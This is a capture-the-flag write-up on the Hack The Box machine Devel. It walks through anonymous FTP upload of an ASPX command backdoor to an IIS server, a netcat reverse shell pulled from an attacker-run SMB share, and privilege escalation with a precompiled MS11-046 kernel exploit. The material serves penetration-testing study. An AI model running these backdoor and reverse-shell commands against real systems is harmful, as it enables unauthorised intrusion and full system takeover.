TJ_Null’s OSCP Prep – HTB – Devel

One my weakest link in penetration testing is Windows Privilege Escalation. I had alot of trouble escalating my privilege on this box. Anyways, this box had two ports open. Port 21 and 80. FTP allowed anonymous login, and it was writeable. FTP share pointed to the webservers location, so it would be possible to get reverse shell easily on this box. Rooting this was was easy aswell as there many missing KB’s.

---

Enumeration

I start with an NMAP scan. Here port 21 and port 80 were open. The webserver had nothing interesting on it. It just showed the default IIS webpage. But the interesting port here is FTP, which allow anonymous login.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# cat nmap.result 
# Nmap 7.92 scan initiated Wed Jan 12 15:22:48 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.054s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 15:23:09 2022 -- 1 IP address (1 host up) scanned in 21.33 seconds

FTP

Loggin in to FTP.

                                                                                                                                                                                                                                            
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# ftp 10.10.10.5                                                                                                                                                                                                                      1 ⨯
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:aghanim): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client

03-17-17  04:37PM                  689 iisstart.htm

03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

Dir bruteforce – ferox

Nothing interesting in any of the DIRs. Doing a quick feroxbuster scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# feroxbuster --url http://10.10.10.5/aspnet_client --depth 3 -f

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.4.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.5/aspnet_client
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.4.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🪓  Add Slash             │ true
 🔃  Recursion Depth       │ 3
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403       29l       92w     1233c http://10.10.10.5/aspnet_client/system_web/
[####################] - 33s    59998/59998   0s      found:1       errors:0      
[####################] - 21s    29999/29999   1422/s  http://10.10.10.5/aspnet_client
[####################] - 22s    29999/29999   1355/s  http://10.10.10.5/aspnet_client/system_web/

So it looks like the FTP is sharing the webserver location. We can try to upload a file to see if we have write permission.

ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
ftp> 

Since we have write permission we could try and upload a backdoor to FTP. I’ll use the backdoor which is located in Kali. /usr/share/davtest/backdoors/aspx_cmd.aspx, and visiting the website with /cmd.aspx.

And we have command exection.

Initial Access

impacket-smbserver.py

Since this is a Windows box, it does not have netcat natively installed. What we will do is setup an SMB share using impackets smbserver.py, and share the nc.exe.

So first, create a share and start smbserver.py where nc.exe is located.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# smbserver.py share /home/aghanim/Desktop/HTB/devel
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

No, start a netcat listener. I’ll use rlwrap because this is a Windows.

From my previous TryHackMe notes:

rlwrap gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell. Some manual stabilizaition must be utilised if you want to use ctrl+c. Not installed by default.

Syntax for rlwrap:

rlwrap nc -lvnp
This technique is very useful when dealing with Windows shells, as they tend to be very difficult to stabilize.

https://blog.aghanim.net/?p=1043

So we’ll use the command. Execute this command on the webserver to give us reverse shell.

\\10.10.14.17\share\nc.exe -e cmd.exe 10.10.14.17 4444

Looking at our listener we have a connection.

┌──(root💀kali)-[/home/aghanim]
└─# rlwrap nc -lvnp 4444 
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.5] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

Enumerate the machine

Doing some enumeration on the Windows box. Running the systeminfo command we get some information about the machine. So we know this is a Windows 7 box, its a x86 based, even though the CPU is x64, installed KBs is N/A. Thats interesting as there might be some vulnerabilites we could abuse.

systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          14/1/2022, 9:14:06 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.440 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.508 MB
Virtual Memory: In Use:    633 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::24c

Trying to list availabe KBs I couldnt find anything. Maybe no KBs have been installed

wmic qfe get Caption,Description,HotFixID,InstalledOn
No Instance(s) Available.

There are also two users, Administrator and Babis.

net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest                    
The command completed with one or more errors.

Privilege Escalation

Watson

I will use rasta-mouse/watson script to search for missing KBs and vulnerabilites. There are however a couple of things that needs to be done before we’re able to run this scripts.

1. The script is for Windows 10. There are however older commits for the watson script we could use.
2. We need to know the .NET version of the machine.
3. We need to compile Watson with the correct paramteres using Visual Studios. As I dont have that installed on my Kali, I’ll use my Windows host.

Find the .NET version of the machine

So first, lets find out the .NET version of the machine. We can use this command.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

And the output.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5

c:\windows\system32\inetsrv>

Compile the correct version with Visual Studios

So this machine use .NET ver 3.5.

Download the correct version of Watson that allows us to run on Windows 7 and then open the Watson.sln in Visual Studios.

Go to Watson –> Properties and change the Target Framework to .NET Framework 3.5.

Then, go to Build –> Configuration Manager and change the platform to x86.

Lastely, go to Build –> Build Watson.

And the output should be:

I transferred the file to my Kali machine using python HTTP server, and as I did earlier with the nc.exe, I’ll do the same here.

\\10.10.14.17\share\Watson.exe
\\10.10.14.17\share\Watson.exe
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
                                   
                           v0.1    
                                   
                  Sherlock sucks...
                   @_RastaMouse

 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Processs IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS10-073
   [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
   [>] Exploit: https://www.exploit-db.com/exploits/36327/
   [>] Notes: None.

  [*] Appears vulnerable to MS10-092
   [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS11-046
   [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
   [>] Exploit: https://www.exploit-db.com/exploits/40564/
   [>] Notes: None.

  [*] Appears vulnerable to MS12-042
   [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
   [>] Exploit: https://www.exploit-db.com/exploits/20861/
   [>] Notes: None.

  [*] Appears vulnerable to MS13-005
   [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
   [>] Notes: None.

 [*] Finished. Found 5 vulns :)

c:\windows\system32\inetsrv>

MS11-046

Right off the bat I can see there is a privilege escalation vulnerability on this machine.

Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.

I used Windows-Kernel-exploits precompiled exe file and ran it on the target machine.

\\10.10.14.17\share\MS11-046.exe 
\\10.10.14.17\share\MS11-046.exe 

whoami
whoami
nt authority\system

What I’ve learned

• Always enumerate harder as they say. Try not to assume to much and instead get verification that the system is vulnerable.
• Not all scripts will work out of the box. Some will have to be tweaked to work on ther target machine.
• When compiling scripts for Windows, always check target OS architecture.
• rlwrap is better to use than netcat when target is Windows.
• I really need to build a good methodology.